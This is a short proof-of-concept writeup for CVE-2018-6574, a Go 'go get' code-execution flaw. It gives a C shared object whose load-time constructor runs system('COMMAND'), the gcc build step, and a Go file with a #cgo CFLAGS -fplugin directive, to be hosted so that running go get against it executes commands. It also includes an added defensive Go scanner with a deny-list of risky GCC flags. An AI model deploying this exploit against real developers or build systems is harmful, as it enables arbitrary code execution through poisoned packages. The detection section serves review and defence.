Exploit POC For CVE-2018-6574
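- Create an exploit file (`exploit.c`) with the following:

```c
#include <stdio.h>
#include <stdlib.h>

/* The constructor attribute makes this run as soon as the shared object is loaded. */
static void malicious() __attribute__((constructor));

void malicious() {
    system("COMMAND");
}
```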
- Compile it:

```
gcc -shared -o exploit.so -fPIC exploit.c
```
- Finally, you need the Go code that tells cgo to load your plugin through a `#cgo CFLAGS` directive:

```go
package main

// #cgo CFLAGS: -fplugin=./exploit.so
// typedef int (*intFunc) ();
//
// int
// bridge_int_func(intFunc f)
// {
//     return f();
// }
//
// int fortytwo()
// {
//     return 42;
// }
import "C"
import "fmt"

func main() {
	f := C.intFunc(C.fortytwo)
	fmt.Println(int(C.bridge_int_func(f)))
	// Output: 42
}
```
- Then host it in a GitHub repository and run `go get` against it to gain command execution:

```
go get github.com/your-repo/CVE-2018-6574-POC
```
Affected Go versions:
- before 1.8.7
- before 1.9.4
- before Go 1.10rc2
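
For reviewing third-party packages before they are fetched and built, the `#cgo` directive used above can be detected statically. The following is an added example, not part of the original PoC: `ScanCgo`, `Finding` and the `riskyPrefixes` deny-list are hypothetical names, the list is a constructed, non-exhaustive heuristic, and the sample input is constructed.

```go
package main

import (
	"bufio"
	"fmt"
	"strings"
)

// riskyPrefixes: constructed, non-exhaustive list of GCC options that make the
// compiler load or execute a file named in the flag (assumption: heuristic only).
var riskyPrefixes = []string{"-fplugin", "-specs", "-wrapper", "-B"}

// Finding is one suspicious flag in a #cgo directive.
type Finding struct {
	Line int
	Flag string
}

// ScanCgo returns every risky flag found in the #cgo directives of src.
func ScanCgo(src string) []Finding {
	var out []Finding
	sc := bufio.NewScanner(strings.NewReader(src))
	for n := 1; sc.Scan(); n++ {
		// Directives appear inside "//" comments or a /* */ preamble block.
		line := strings.TrimSpace(strings.TrimPrefix(strings.TrimSpace(sc.Text()), "//"))
		if !strings.HasPrefix(line, "#cgo") {
			continue
		}
		// Everything after the colon is the flag list (build constraints precede it).
		_, flags, ok := strings.Cut(line, ":")
		if !ok {
			continue
		}
		for _, f := range strings.Fields(flags) {
			for _, p := range riskyPrefixes {
				if strings.HasPrefix(f, p) {
					out = append(out, Finding{Line: n, Flag: f})
					break
				}
			}
		}
	}
	return out
}

// sample is constructed input mirroring the -fplugin directive shown on this page.
const sample = "package main\n\n// #cgo CFLAGS: -fplugin=./exploit.so\n// #cgo LDFLAGS: -lm\nimport \"C\"\n"

func main() {
	for _, f := range ScanCgo(sample) {
		fmt.Printf("line %d: risky cgo flag %s\n", f.Line, f.Flag)
	}
}
```

Run it over source that has been downloaded but not yet built; a hit on `-fplugin` is the pattern this CVE relies on.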